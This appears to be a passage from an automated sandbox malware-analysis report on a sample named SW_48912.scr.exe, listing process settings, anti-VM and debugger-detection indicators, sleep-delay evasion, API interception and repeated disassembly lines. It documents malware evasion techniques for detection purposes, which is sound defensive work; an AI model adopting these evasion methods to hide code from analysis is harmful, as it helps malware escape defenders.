                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: SW_48912.scr.exe PID: 7084, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\sdchange.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory allocated: 2390000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory allocated: 4530000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory allocated: 8710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory allocated: 6D70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory allocated: 9710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeMemory allocated: A710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0142096E rdtsc 5_2_0142096E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4021Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 883Jump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\sdchange.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\SW_48912.scr.exe TID: 7152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2920Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exe TID: 2032Thread sleep count: 42 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exe TID: 2032Thread sleep time: -84000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe TID: 3488Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe TID: 3488Thread sleep time: -34500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sdchange.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sdchange.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\sdchange.exeCode function: 10_2_0271C3C0 FindFirstFileW,FindNextFileW,FindClose,10_2_0271C3C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: SW_48912.scr.exe, 00000000.00000002.1939670735.0000000008486000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: SW_48912.scr.exe, 00000000.00000002.1939670735.0000000008486000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: sdchange.exe, 0000000A.00000002.3538625637.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.2331578058.000001993BE5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: kygSlzwdnMXWUy.exe, 0000000B.00000002.3539278813.000000000119F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\sdchange.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0142096E rdtsc 5_2_0142096E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_004176B3 LdrLoadDll,5_2_004176B3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01474144 mov eax, dword ptr fs:[00000030h]5_2_01474144
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01474144 mov eax, dword ptr fs:[00000030h]5_2_01474144
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01474144 mov ecx, dword ptr fs:[00000030h]5_2_01474144
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01474144 mov eax, dword ptr fs:[00000030h]5_2_01474144
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01474144 mov eax, dword ptr fs:[00000030h]5_2_01474144
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01478158 mov eax, dword ptr fs:[00000030h]5_2_01478158
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4164 mov eax, dword ptr fs:[00000030h]5_2_014B4164
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B4164 mov eax, dword ptr fs:[00000030h]5_2_014B4164
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov eax, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov ecx, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov eax, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov eax, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov ecx, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov eax, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov eax, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov ecx, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov eax, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E10E mov ecx, dword ptr fs:[00000030h]5_2_0148E10E
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148A118 mov ecx, dword ptr fs:[00000030h]5_2_0148A118
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148A118 mov eax, dword ptr fs:[00000030h]5_2_0148A118
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148A118 mov eax, dword ptr fs:[00000030h]5_2_0148A118
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148A118 mov eax, dword ptr fs:[00000030h]5_2_0148A118
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A0115 mov eax, dword ptr fs:[00000030h]5_2_014A0115
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01410124 mov eax, dword ptr fs:[00000030h]5_2_01410124
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6154 mov eax, dword ptr fs:[00000030h]5_2_013E6154
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E6154 mov eax, dword ptr fs:[00000030h]5_2_013E6154
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DC156 mov eax, dword ptr fs:[00000030h]5_2_013DC156
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A61C3 mov eax, dword ptr fs:[00000030h]5_2_014A61C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A61C3 mov eax, dword ptr fs:[00000030h]5_2_014A61C3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E1D0 mov eax, dword ptr fs:[00000030h]5_2_0145E1D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E1D0 mov eax, dword ptr fs:[00000030h]5_2_0145E1D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E1D0 mov ecx, dword ptr fs:[00000030h]5_2_0145E1D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E1D0 mov eax, dword ptr fs:[00000030h]5_2_0145E1D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0145E1D0 mov eax, dword ptr fs:[00000030h]5_2_0145E1D0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DA197 mov eax, dword ptr fs:[00000030h]5_2_013DA197
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DA197 mov eax, dword ptr fs:[00000030h]5_2_013DA197
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DA197 mov eax, dword ptr fs:[00000030h]5_2_013DA197
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B61E5 mov eax, dword ptr fs:[00000030h]5_2_014B61E5
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014101F8 mov eax, dword ptr fs:[00000030h]5_2_014101F8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149C188 mov eax, dword ptr fs:[00000030h]5_2_0149C188
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149C188 mov eax, dword ptr fs:[00000030h]5_2_0149C188
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01420185 mov eax, dword ptr fs:[00000030h]5_2_01420185
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01484180 mov eax, dword ptr fs:[00000030h]5_2_01484180
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01484180 mov eax, dword ptr fs:[00000030h]5_2_01484180
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146019F mov eax, dword ptr fs:[00000030h]5_2_0146019F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146019F mov eax, dword ptr fs:[00000030h]5_2_0146019F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146019F mov eax, dword ptr fs:[00000030h]5_2_0146019F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146019F mov eax, dword ptr fs:[00000030h]5_2_0146019F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01466050 mov eax, dword ptr fs:[00000030h]5_2_01466050
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DA020 mov eax, dword ptr fs:[00000030h]5_2_013DA020
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DC020 mov eax, dword ptr fs:[00000030h]5_2_013DC020
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE016 mov eax, dword ptr fs:[00000030h]5_2_013FE016
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE016 mov eax, dword ptr fs:[00000030h]5_2_013FE016
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE016 mov eax, dword ptr fs:[00000030h]5_2_013FE016
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE016 mov eax, dword ptr fs:[00000030h]5_2_013FE016
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140C073 mov eax, dword ptr fs:[00000030h]5_2_0140C073
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01464000 mov ecx, dword ptr fs:[00000030h]5_2_01464000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01482000 mov eax, dword ptr fs:[00000030h]5_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01482000 mov eax, dword ptr fs:[00000030h]5_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01482000 mov eax, dword ptr fs:[00000030h]5_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01482000 mov eax, dword ptr fs:[00000030h]5_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01482000 mov eax, dword ptr fs:[00000030h]5_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01482000 mov eax, dword ptr fs:[00000030h]5_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01482000 mov eax, dword ptr fs:[00000030h]5_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01482000 mov eax, dword ptr fs:[00000030h]5_2_01482000
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E2050 mov eax, dword ptr fs:[00000030h]5_2_013E2050
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01476030 mov eax, dword ptr fs:[00000030h]5_2_01476030
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014620DE mov eax, dword ptr fs:[00000030h]5_2_014620DE
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D80A0 mov eax, dword ptr fs:[00000030h]5_2_013D80A0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014660E0 mov eax, dword ptr fs:[00000030h]5_2_014660E0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014220F0 mov ecx, dword ptr fs:[00000030h]5_2_014220F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E208A mov eax, dword ptr fs:[00000030h]5_2_013E208A
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DC0F0 mov eax, dword ptr fs:[00000030h]5_2_013DC0F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013E80E9 mov eax, dword ptr fs:[00000030h]5_2_013E80E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DA0E3 mov ecx, dword ptr fs:[00000030h]5_2_013DA0E3
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014780A8 mov eax, dword ptr fs:[00000030h]5_2_014780A8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A60B8 mov eax, dword ptr fs:[00000030h]5_2_014A60B8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014A60B8 mov ecx, dword ptr fs:[00000030h]5_2_014A60B8
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B634F mov eax, dword ptr fs:[00000030h]5_2_014B634F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01462349 mov eax, dword ptr fs:[00000030h]5_2_01462349
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014AA352 mov eax, dword ptr fs:[00000030h]5_2_014AA352
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01488350 mov ecx, dword ptr fs:[00000030h]5_2_01488350
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov ecx, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0146035C mov eax, dword ptr fs:[00000030h]5_2_0146035C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DC310 mov ecx, dword ptr fs:[00000030h]5_2_013DC310
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148437C mov eax, dword ptr fs:[00000030h]5_2_0148437C
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A30B mov eax, dword ptr fs:[00000030h]5_2_0141A30B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A30B mov eax, dword ptr fs:[00000030h]5_2_0141A30B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0141A30B mov eax, dword ptr fs:[00000030h]5_2_0141A30B
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_01400310 mov ecx, dword ptr fs:[00000030h]5_2_01400310
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B8324 mov eax, dword ptr fs:[00000030h]5_2_014B8324
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B8324 mov ecx, dword ptr fs:[00000030h]5_2_014B8324
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B8324 mov eax, dword ptr fs:[00000030h]5_2_014B8324
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014B8324 mov eax, dword ptr fs:[00000030h]5_2_014B8324
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0149C3CD mov eax, dword ptr fs:[00000030h]5_2_0149C3CD
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014663C0 mov eax, dword ptr fs:[00000030h]5_2_014663C0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E3DB mov eax, dword ptr fs:[00000030h]5_2_0148E3DB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E3DB mov eax, dword ptr fs:[00000030h]5_2_0148E3DB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E3DB mov ecx, dword ptr fs:[00000030h]5_2_0148E3DB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0148E3DB mov eax, dword ptr fs:[00000030h]5_2_0148E3DB
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014843D4 mov eax, dword ptr fs:[00000030h]5_2_014843D4
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014843D4 mov eax, dword ptr fs:[00000030h]5_2_014843D4
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D8397 mov eax, dword ptr fs:[00000030h]5_2_013D8397
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D8397 mov eax, dword ptr fs:[00000030h]5_2_013D8397
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013D8397 mov eax, dword ptr fs:[00000030h]5_2_013D8397
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE388 mov eax, dword ptr fs:[00000030h]5_2_013DE388
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE388 mov eax, dword ptr fs:[00000030h]5_2_013DE388
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013DE388 mov eax, dword ptr fs:[00000030h]5_2_013DE388
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_014163FF mov eax, dword ptr fs:[00000030h]5_2_014163FF
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE3F0 mov eax, dword ptr fs:[00000030h]5_2_013FE3F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE3F0 mov eax, dword ptr fs:[00000030h]5_2_013FE3F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013FE3F0 mov eax, dword ptr fs:[00000030h]5_2_013FE3F0
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140438F mov eax, dword ptr fs:[00000030h]5_2_0140438F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_0140438F mov eax, dword ptr fs:[00000030h]5_2_0140438F
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
                Source: C:\Users\user\Desktop\SW_48912.scr.exeCode function: 5_2_013F03E9 mov eax, dword ptr fs:[00000030h]5_2_013F03E9
